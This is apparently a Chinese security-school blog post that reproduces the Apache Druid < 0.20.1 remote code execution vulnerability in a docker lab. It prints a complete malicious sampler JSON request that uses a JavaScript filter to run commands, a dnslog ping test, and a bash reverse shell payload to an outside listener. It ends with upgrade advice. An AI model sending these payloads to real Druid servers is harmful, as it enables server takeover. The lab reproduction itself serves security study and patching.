> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码， 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/pDj2D8w7G1IsF-Wv7Jr8-Q)

![](https://mmbiz.qpic.cn/mmbiz_gif/7QRTvkK2qC6pRiabDicuyO5uBZsDB68SyC0XxgOZhLhlViaOZ1YCIFFeMJjrXWeooBlQ1e4FbKVVYYVGyuZZkicfBA/640?wx_fmt=gif)

本文由 “网络安全检测与防护技术国家地方联合工程研究中心深圳分中心——东塔网络安全学院” 总结归纳

**0x****00** **简介**

Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理，也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。另外，Druid 还有一个关键的特点：它支持根据时间戳对数据进行预聚合摄入和聚合分析，因此也有用户经常在有时序数据处理分析的场景中用到它。

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHicibzNvsMty8iaEZR5bUXmWGic9q1oWl8CjMxvJ7dplxJx9Jb6DZThSduQ/640?wx_fmt=png) 

**0x****0****1 漏洞概述**

在 Druid 0.20.0 及更低版本中，用户发送恶意请求，利用 Apache Druid 漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码，控制服务器。

**0x****0****2 影响版本**

Apache Druid < 0.20.1

**0x****0****3 环境搭建**

1、本次环境使用 docker 搭建，需要在虚拟机安装 docker，安装完成后使用以下命令 pull 漏洞环境

```
docker pull fokkodriesprong/docker-druid
```

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHWrqTgoT292Sq5PkBJNVuCTwuPsOQY45ia0Lf1tGXIX9libcD5PXuBmeQ/640?wx_fmt=png) 

2、下载漏洞环境后使用以下命令启动漏洞环境

```
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
```

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHAxx8FXtpek7q7HAYUiczv3ofy3KygZKS02Zy7HicLSo5jGicxAJkghVQQ/640?wx_fmt=png) 

3、启动后在浏览器访问 http://your-ip:8888/ 看到以下界面表示成功

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHPfibnRFrKn99ibGsIsABrbDjYOVA8m86gWd9hpDl6n43gkeCEyh78FDg/640?wx_fmt=png) 

**0x****0****4 漏洞复现**

1、在浏览器进入 Apache Druid 首页如何点击点击左上方 Load data -> Local disk 按钮

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHl7KEcH8ib7QgkaGjO26GicHiclUf3jFibdndL263AMaibAEPQvic00LegOfQ/640?wx_fmt=png) 

2、右侧表单填入 Base directory:（quickstart/tutorial/）File filter:

（wikiticker-2015-09-12-sampled.json.gz）填入完成点击 Preview，然后点击 next

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHCuyPb1LIplLarrle7ax5qV083zdFVzvQ9zeDhiaUWE069oICia7u8FxQ/640?wx_fmt=png) 

3、打开 burp 并配置代理，然后一直点击 next，直到下一步是 Next：Filter 时，抓取数据包

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHnFsbiaVzWiat8THuSFjkSicOJloLFQLJW9czY85RSdwy0hgkPBTnocsWQ/640?wx_fmt=png) 

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHouxic4SnHGlzicxic3kiaA5FojokmDpWP1ribTphKSvdfFPMcZjnKzT5G2Q/640?wx_fmt=png) 

4、然后替换数据包中的 data 数据为以下代码，然后修改代码中的 dnslog 地址为自己的，点击发送，查看 dnslog 是否有数据

<table cellspacing="0"><tbody><tr><td width="553" valign="top"><p>{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",</p><p>"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping kujqmk.dnslog.cn -c 1')}",</p><p>"dimension":"added",</p><p>"":{</p><p>"enabled":"true"</p><p>}</p><p>}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}</p></td></tr></tbody></table>

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHWDUeXOy0D3vjicm07pu4BBvm0tMdEkWHIyB2u6ictWIPticicV01MECr6A/640?wx_fmt=png) 

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHdGk6ZtZ441UjyiaKyqa2bbkuxwicnKPiaDYu8qI2qje1Q9LpzWQpy9nHw/640?wx_fmt=png) 

5、修改 dnslog 地址为反弹 shell 的 payload，在 kali 中设置监听，可以看到成功反弹 shell

```
exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/172.16.1.132/8896 0>&1')
```

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdH00BJGwLauNA1vgFbJJ1icY37mk2GvKHCicSoYtC2KbLib1qIQn3uGsw7A/640?wx_fmt=png) 

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHMBSCYKYg1P0EYgJwHQ9mVNPk4iaVYk9y0YcTokZsnxGfiakTdeOV25Gw/640?wx_fmt=png) 

**0x****0****5 修复建议**

1、升级到最新版 Apache Druid，下载地址为

https://druid.apache.org/downloads.html  

免责申明：   

本项目仅进行信息搜集，漏洞探测工作，无漏洞利用、攻击性行为，发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。

请使用者遵守当地相关法律，勿用于非授权测试，勿用于非授权测试，勿用于非授权测试（重要的事情说三遍），如作他用所承受的法律责任一概与东塔网络安全学院无关！

东塔网络安全学院在各大平台均上线了各项活动和学习内容，快快登录以下各大平台学习起来吧~  

微博、腾讯课堂、知乎、今日头条、抖音：

东塔网络安全学院

哔哩哔哩：东塔网络安全

了解更多活动和咨询欢迎微信添加：dongtakefu

  

  

![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHgExUMIw1IEB6ksCervibzqV47ziaqkWzHhb2xS8zNg2fRAKftOZVjapw/640?wx_fmt=jpeg)

**- 免费获取学习资料**

**电子书籍、试听课程 -**

  

  

![](https://mmbiz.qpic.cn/sz_mmbiz_png/UKJ0CBLX4GosWIhsaibtwTy7RmoyPJzdHaPVyeNico2PnaKiabI8TqDj6eYKiaPaJeARuZXspyP9BcQDbzwuDkhVaw/640?wx_fmt=png)

![](https://mmbiz.qpic.cn/mmbiz_png/FIBZec7ucChaE0GfBticZTQQq7TyhaiaeptZbqmENrZO6pazDwFpVB6aTFicgLwngsOuNLMY3sIMxddybn82O4Q8w/640?wx_fmt=png)

![](https://mmbiz.qpic.cn/mmbiz_png/FIBZec7ucChaE0GfBticZTQQq7Tyhaiaepl2oEubhGdZoAicHvXAYeSiarPXAy9OXNtJiaCkvviccX0w0Z0t0ibBnnD2Q/640?wx_fmt=png)

点击蓝字

分享我们